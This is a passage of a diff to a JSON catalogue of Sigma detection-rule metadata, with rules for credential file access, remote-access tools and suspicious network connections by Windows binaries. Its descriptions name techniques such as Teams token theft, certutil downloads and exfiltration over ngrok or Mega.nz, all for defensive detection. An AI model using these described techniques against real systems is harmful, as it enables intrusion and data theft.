"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", - "value": "WebServer Access Logs Deleted" - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "meta": { - "author": "@SerkinValery", - "creation_date": "2022/09/16", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_access_susp_teams.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ] - }, - "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "value": "Suspicious File Event With Teams Objects" - }, - { - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_access_susp_unattend_xml.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", - "value": "Suspicious Unattend.xml File Access" - }, - { - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "meta": { - "author": "@ROxPinTeddy", - "creation_date": "2020/05/12", - "falsepositive": [ - "Legitimate administrative use" - ], - "filename": "file_event_win_advanced_ip_scanner.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + "https://pypi.org/project/scapy/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, - "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "value": "Advanced IP Scanner - File Event" + "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "value": "Python Initiated Connection" }, { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Detects suspicious network connection by Notepad", "meta": { - "author": "frack113", - "creation_date": "2022/02/11", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_anydesk_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", - "value": "Anydesk Temporary Artefact" - }, - { - "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/28", + "author": "EagleEye Team", + "creation_date": "2020/05/14", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml", + "filename": "net_connection_win_notepad_network_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", + "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "value": "Notepad Making Network Connection" + }, + { + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/08/17", + "falsepositive": [ + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + ], + "filename": "net_connection_win_dead_drop_resolvers.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" + ] + }, + "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "value": "Dead Drop Resolvers" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script_wan.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "value": "Script Initiated Connection to Non-Local Network" + }, + { + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_binary_no_cmdline.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "20384606-a124-4fec-acbb-8bd373728613", + "value": "Suspicious Network Connection Binary No CommandLine" + }, + { + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_hh.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", + "value": "HH.EXE Network Connections" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate use of wuauclt.exe over the network." + ], + "filename": "net_connection_win_wuauclt_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "value": "Wuauclt Network Connection" + }, + { + "description": "Detects a rundll32 that communicates with public IP addresses", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/04", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_rundll32_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.execution" + ] + }, + "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "value": "Rundll32 Internet Connection" + }, + { + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/05/15", + "falsepositive": [ + "Other Remote Desktop RDP tools", + "Domain controller using dns.exe" + ], + "filename": "net_connection_win_susp_rdp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "value": "Suspicious Outbound RDP Connections" + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_regsvr32_network_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "value": "Regsvr32 Network Activity" + }, + { + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" + ], + "filename": "net_connection_win_remote_powershell_session_network.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "value": "Remote PowerShell Session (Network)" + }, + { + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "value": "Microsoft Sync Center Suspicious Network Connections" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_to_http.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "value": "RDP to HTTP or HTTPS Target Ports" + }, + { + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "creation_date": "2021/11/10", + "falsepositive": [ + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." + ], + "filename": "net_connection_win_excel_outbound_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://corelight.com/blog/detecting-cve-2021-42292", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", + "value": "Excel Network Connections" + }, + { + "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate certutil network connection" + ], + "filename": "net_connection_win_certutil.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", + "value": "Certutil Initiated Connection" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Other SMTP tools" + ], + "filename": "net_connection_win_susp_outbound_smtp_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9976fa64-2804-423c-8a5b-646ade840773", + "value": "Suspicious Outbound SMTP Connections" + }, + { + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_binary_susp_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "value": "Microsoft Binary Suspicious Communication Endpoint" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_win_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", + "value": "Communication To Ngrok Tunneling Service" + }, + { + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_malware_backconnect_ports.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "value": "Suspicious Typical Malware Back Connect Ports" + }, + { + "description": "Detects a possible remote connections to Silenttrinity c2", + "meta": { + "author": "Kiran kumar s, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127.001" + ] + }, + "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "value": "Silenttrinity Stager Msbuild Activity" + }, + { + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "meta": { + "author": "frack113, Tim Shelton (fps)", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_epmap.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/TaskShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "value": "Suspicious Epmap Connection" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "value": "Script Initiated Connection" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "value": "Suspicious Outbound Kerberos Connection" + }, + { + "description": "Detects programs with network connections running in suspicious files system locations", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_prog_location_network_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "value": "Suspicious Program Location with Network Connections" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "value": "RDP Over Reverse SSH Tunnel" + }, + { + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use of ngrok.io" + ], + "filename": "net_connection_win_ngrok_io.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://ngrok.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "18249279-932f-45e2-b37a-8925f2597670", + "value": "Communication To Ngrok.Io" + }, + { + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Legitimate script" + ], + "filename": "net_connection_win_imewdbld.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", + "value": "Download a File with IMEWDBLD.exe" + }, + { + "description": "Detects Dllhost that communicates with public IP addresses", + "meta": { + "author": "bartblaze", + "creation_date": "2020/07/13", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_dllhost_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://redcanary.com/blog/child-processes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution", + "attack.t1559.001" + ] + }, + "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", + "value": "Dllhost Internet Connection" + }, + { + "description": "Detects suspicious network connection by Cmstp", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_cmstp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "value": "Cmstp Making Network Connection" + }, + { + "description": "Detects network connections from Equation Editor", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_eqnedt.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://twitter.com/forensicitguy/status/1513538712986079238", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "value": "Equation Editor Network Connection" + }, + { + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/20", + "falsepositive": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "filename": "net_connection_win_susp_dropbox_api.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" + ], + "tags": "No established tags" + }, + "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "value": "Suspicious Dropbox API Usage" + }, + { + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate use of mega.nz uploaders and tools" + ], + "filename": "net_connection_win_mega_nz.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "value": "Communication To Mega.nz" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": 